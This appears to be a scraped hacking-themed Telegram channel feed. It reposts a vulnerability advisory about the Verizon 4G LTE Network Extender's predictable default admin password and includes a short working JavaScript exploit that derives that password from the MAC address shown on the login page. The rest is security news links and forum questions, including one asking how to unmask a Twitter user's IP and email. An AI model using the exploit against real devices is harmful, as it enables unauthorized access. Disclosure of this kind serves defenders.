Hacking Articles Tips Tricks Videos Tutorials
467 subscribers
65.7K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Verizon 4G LTE Network Extender 0.4.038.2131 Weak Credential Algorithm

https://3.bp.blogspot.com/-ZdpKmdYlHbY/WWlu_uhv-yI/AAAAAAAAIKA/GrhbPhfNXpolamaXsSLRo9Cb0FKriXUgQCLcBGAs/s1600/h12.png
Verizon's 4G LTE Network Extender is utilizing a weak default admin password generation algorithm. The password is generated using the last 4 values from device's MAC address which is disclosed on the main webUI login page to an unauthenticated attacker. The values are then concatenated with the string LTEFemto resulting in something like LTEFemtoD080 as the default Admin password. Versions GA4.38 through 0.4.038.2131 are affected.

MD5 | defda71595d58bb3b899ae80b3a351c1

Download

Verizon 4G LTE Network Extender Weak Credentials Algorithm
Vendor: Verizon Communications Inc.
Product web page: https://www.verizon.com
Affected version: GA4.38 - V0.4.038.2131

Summary: An LTE Network Extender enhances your indoor and 4G
LTE data and voice coverage to provide better service for your
4G LTE mobile devices. It's an extension of our 4G LTE network
that's placed directly in your home or office. The LTE Network
Extender works with all Verizon-sold 4G LTE mobile devices for
4G LTE data service and HD Voice-capable 4G LTE devices for voice
service. This easy-to-install device operates like a miniature
cell tower that plugs into your existing high-speed broadband
connection to communicate with the Verizon wireless network.

Desc: Verizon's 4G LTE Network Extender is utilising a weak
default admin password generation algorithm. The password is
generated using the last 4 values from device's MAC address
which is disclosed on the main webUI login page to an unauthenticated
attacker. The values are then concatenated with the string
'LTEFemto' resulting in something like 'LTEFemtoD080' as the
default Admin password.

Tested on: lighttpd-web
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5701
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5701.php
17.02.2022

--
snippet:///Exploit
//
// Verizon 4G LTE Network Extender Super Awesome JS Exploit
//

console.log("Calling 'isDefaultPassword' API");
let req = new Request("/webapi/isDefaultPassword");
let def = req.url;

const doAjax = async () => {
const resp = await fetch(def);
if (resp.ok) {
const jsonyo = await resp.json();
return Promise.resolve(jsonyo);
} else {
return Promise.reject("Smth not rite captain!");
}
}
doAjax().then(console.log).catch(console.log);

await new Promise(t => setTimeout(t, 1337));

console.log("Verizon Admin Password: ");
let mac = document.querySelector("#mac_address").innerHTML;
console.log("LTEFemto" + mac.substr(-4));

Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Dark Reading: Attacks/Breaches
Identifying a Vulnerability in the SAP Software Supply Chain

Make sure you're using the patch to block this supply chain attack.
Rules of Engagement for Pentesters
https://www.reddit.com/r/Pentesting/comments/u2vc9x/rules_of_engagement_for_pentesters/

Hello Everyone, I am a Lawyer and recently a Client asked me to draw up rules of engagement for Pentesters that will be working on the projects posted on his Platform.
I don't know much about the space, therefore, was looking to get some insights from the Community. As to what rules the Pentesters have to abide by when performing their functions. P.S. I have done my research and went through the HackerOne Rules of Engagement for Pentesters, while the same was not available on other websites like Cobalt.io (https://cobalt.io/) or Bugcrowd.
Any insights or documents that you could lead me to would be of great help. Cheers. submitted by /u/Park-Beginning (https://www.reddit.com/user/Park-Beginning)
[link] (https://www.reddit.com/r/Pentesting/comments/u2vc9x/rules_of_engagement_for_pentesters/) [comments] (https://www.reddit.com/r/Pentesting/comments/u2vc9x/rules_of_engagement_for_pentesters/)

___________________________
@hacking_Attack
@Hacking_Video
Social Hunter

Crawls the given URL and finds broken social media links that can be hijacked. Broken social links may allow an attacker to conduct…Continue reading on Medium »
Read more...
hacking: security in practice
grabbing a twitter user's IP, or possibly more, with ethical reasons

let's say, hypothetically, i know a twitter user who claims to be a middle school PE teacher in georgia, and is one of those lolicon bags of shit, how could i get information such as an IP address, email, etc. from the account so i could report this account to their employer?

submitted by /u/eshum953
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Wireshark asking me to turn off Promiscuous Mode?

So I bought a network adapter. I bridged it to my laptop's network card. I set it into Promiscuous Mode. Wireshark errors and tells me to turn off the Promiscuous Mode. Is this just a Windows 10 issue?

submitted by /u/StornZ
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
Dark Reading: Attacks/Breaches
Securing the Stopgap: Controlling Access to SaaS Applications

If enterprises continue to use emergency measures as long-term solutions, they must protect their IT estate.